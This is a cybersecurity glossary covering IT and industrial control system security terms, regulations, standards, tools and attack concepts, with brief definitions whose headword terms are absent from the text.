Cybersecurity Glossary

Physical isolation of a network or system from all other networks, including the Internet, used as a security measure for critical infrastructure.

An Advanced Persistent Threat - a long-term, targeted cyber operation conducted by a highly skilled actor, often state-affiliated.

A communication protocol designed for building automation, enabling integration of HVAC, lighting, access control and fire protection systems.

An integrated platform for web application security testing, enabling interception, analysis and modification of HTTP/HTTPS traffic.

A Cloud Access Security Broker - a control layer between users and cloud services that enforces security and data protection policies.

A set of 18 prioritised security actions developed by the Center for Internet Security - a practical guide to defending against the most common attacks.

The infrastructure and communication channels used by an attacker to remotely control compromised systems and exfiltrate data.

An EU regulation imposing cybersecurity requirements on products with digital elements placed on the European market.

Unauthorised use of the victim's computing resources to mine cryptocurrency - often with no visible symptoms other than performance degradation.

A vulnerability scoring system that assigns a rating from 0 to 10 based on technical characteristics. Used to standardise the assessment of vulnerability severity.

A model describing the seven phases of a cyberattack - from target reconnaissance to achieving objectives. Helps plan defences at every stage.

A network device enforcing unidirectional data flow, making any traffic in the reverse direction physically impossible - used to protect critical networks.

A distributed control system used in process industries for automating continuous production processes such as refining or chemical manufacturing.

A security strategy based on multiple overlapping layers of protection. The failure of one layer does not lead to compromise of the entire system.

The discipline of preserving, recovering and analysing digital evidence in a manner that maintains its evidentiary value.

Data Loss Prevention - technologies and processes that detect and block unauthorised transfer, copying or sharing of confidential information.

A communication protocol used in energy and critical infrastructure for reliable data exchange between master stations and field devices over unreliable links.

An EU regulation on the digital operational resilience of the financial sector. Requires TLPT testing, ICT risk management and third-party oversight.

An endpoint detection and response system that monitors process activity, file changes and network connections on devices to detect and stop threats.

An industrial communication protocol based on standard Ethernet and the CIP model, used for real-time control and data exchange in automation environments.

A family of digital communication protocols used to connect field devices with controllers in industrial automation installations.

An engineering discipline ensuring that control and safety systems respond correctly to hazardous conditions, minimising risk to people and the environment.

The General Data Protection Regulation - EU law governing the processing of personal data of individuals, in force since 25 May 2018.

A communication protocol that enables digital data transmission over traditional 4-20 mA analogue lines in industrial installations.

Human-Machine Interface - a panel or application that enables an operator to visualise an industrial process and issue control commands.

A deliberately exposed decoy system mimicking real assets to attract attackers, detect intrusion attempts and gather data about attack techniques.

Identity and Access Management - a framework of processes and technologies ensuring that the right users have the right access to the right resources at the right time.

Industrial Control Systems - a general term for industrial automation systems encompassing SCADA, DCS, PLC and other components that control processes.

A series of international standards defining security requirements for industrial automation and control systems (IACS) at every level of the organisation.

An organised process for detecting, analysing, containing and recovering from security incidents - from preparation through to lessons learned.

A buffer zone between the corporate IT network and the industrial OT network, enabling controlled data exchange without a direct connection between the two.

A security threat originating from a person with authorised access to organisational resources - an employee, contractor or business partner.

An international standard specifying requirements for an information security management system (ISMS). The foundation for organisational security certification.

The technique of an attacker moving between systems within a compromised network to gain access to higher-value assets.

An attack technique that leverages legitimate system tools (PowerShell, WMI, certutil) instead of malware - making detection significantly harder.

The process of examining malicious software to understand its functionality, mechanisms, C2 infrastructure and detection opportunities.

A penetration testing platform containing hundreds of exploits, reconnaissance modules, payloads and post-exploitation tools in a single environment.

Multi-factor authentication - an identity verification method requiring at least two independent factors: something you know, something you have, or something you are.

A knowledge base of adversary tactics, techniques and procedures. Used to classify threats and assess an organisation's detection capabilities.

One of the oldest and most widely used communication protocols in industrial automation. It has no built-in security mechanisms.

A network detection and response system that analyses packets and flows to identify anomalies and known attack patterns in network traffic.

An EU directive establishing cybersecurity requirements for essential and important entities. Covers risk management, incident reporting and supply chain security.

The NIST guide to operational technology security - a compendium of best practices for protecting ICS and OT environments.

The NIST Cybersecurity Framework - voluntary guidelines helping organisations manage cyber risk through six functions: govern, identify, protect, detect, respond, recover.

An open-source network scanning and security auditing tool for host discovery, service identification and vulnerability detection.

A modern industrial communication protocol with built-in security mechanisms. Enables data exchange between devices from different manufacturers.

An operational security testing methodology defining metrics and processes for assessing security across five channels: human, physical, wireless, telecommunications and network.

The process of identifying, inventorying and monitoring all devices and systems in industrial networks - the foundation of an effective OT cybersecurity programme.

Protection of operational technology (OT) systems against cyber threats. Covers securing industrial networks, devices and protocols.

A list of the ten most critical web application security risk categories, published by OWASP - the standard for application security awareness.

Privileged Access Management - a set of practices and tools for controlling, monitoring and auditing elevated-privilege accounts within an organisation.

The Payment Card Industry Data Security Standard defining requirements for organisations that process, store or transmit cardholder data.

A controlled attack simulation against IT systems to discover vulnerabilities before a real attacker exploits them.

A social engineering technique involving impersonation of a trusted entity to steal credentials, personal data or trick the victim into performing a harmful action.

Programmable Logic Controller - a device that controls industrial processes based on programmed logic and sensor inputs.

The Polish Act on the National Cybersecurity System implementing the NIS Directive, regulating obligations of essential service operators and digital service providers.

An engineering discipline focused on preventing catastrophic failures in industrial installations by managing risks associated with hazardous materials and high-energy processes.

An open industrial communication standard based on Ethernet, providing real-time data exchange between controllers and field devices.

The Penetration Testing Execution Standard defining seven test phases - from reconnaissance to reporting - ensuring repeatability and comprehensiveness.

A hierarchical reference model describing the layers of network architecture in industrial environments - from field devices to business systems.

Malicious software that encrypts the victim's data and demands a ransom for decryption. Today it is often combined with data theft and double extortion.

An advanced attack simulation covering the full spectrum of techniques - from social engineering to system exploitation - conducted under conditions close to a real threat.

The process of analysing software, firmware or a protocol to understand its operation without access to the source code.

Remote Terminal Unit - a device that collects data from field sensors and transmits it to a SCADA system via telecommunications links.

An isolated execution environment for safely running and analysing suspicious software without risk to production systems.

A network architecture combining networking functions (SD-WAN) and security (CASB, SWG, ZTNA, FWaaS) in a single cloud-delivered platform.

A supervisory control and data acquisition system enabling remote monitoring and control of industrial processes in real time.

A system for centrally collecting, correlating and analysing security logs from multiple sources to detect threats and support incident response.

An independent automation system responsible for bringing a process to a safe state when a hazardous condition is detected.

A platform combining security tool orchestration, incident response automation and case management in a single solution.

Security Operations Centre - the team and infrastructure responsible for continuous monitoring, detection and response to security incidents.

An auditing standard defining requirements for security, availability, processing integrity, confidentiality and privacy for service providers.

A targeted phishing attack aimed at a specific individual or organisation, using personalised information to increase message credibility.

A cyber-attack targeting an organisation through compromise of its software vendor, service provider or component supplier - bypassing the target's direct defences.

Proactively searching IT/OT infrastructure to detect threats that have evaded automated detection systems - conducted by experienced analysts.

The systematic collection, analysis and use of information about cyber threats to support informed decisions about organisational defence.

Threat-Led Penetration Testing - an advanced form of security assessment required by DORA for systemically important financial institutions.

A continuous process of identifying, assessing, prioritising and remediating vulnerabilities in an organisation's IT and industrial systems.

A web application firewall that filters and monitors HTTP traffic between the Internet and a web application, protecting against attacks such as SQL injection and XSS.

Malicious software designed solely to permanently destroy data or damage victim systems - with no possibility of data recovery.

An open-source network protocol analyser enabling real-time packet capture and detailed inspection of network traffic.

A security platform integrating data from multiple protection layers - endpoints, network, cloud, email - for automated detection and response to advanced threats.

A pattern description language for identifying and classifying malicious software based on textual and binary characteristics.

A security model that assumes no implicit trust - every user, device and connection must be verified before being granted access to resources.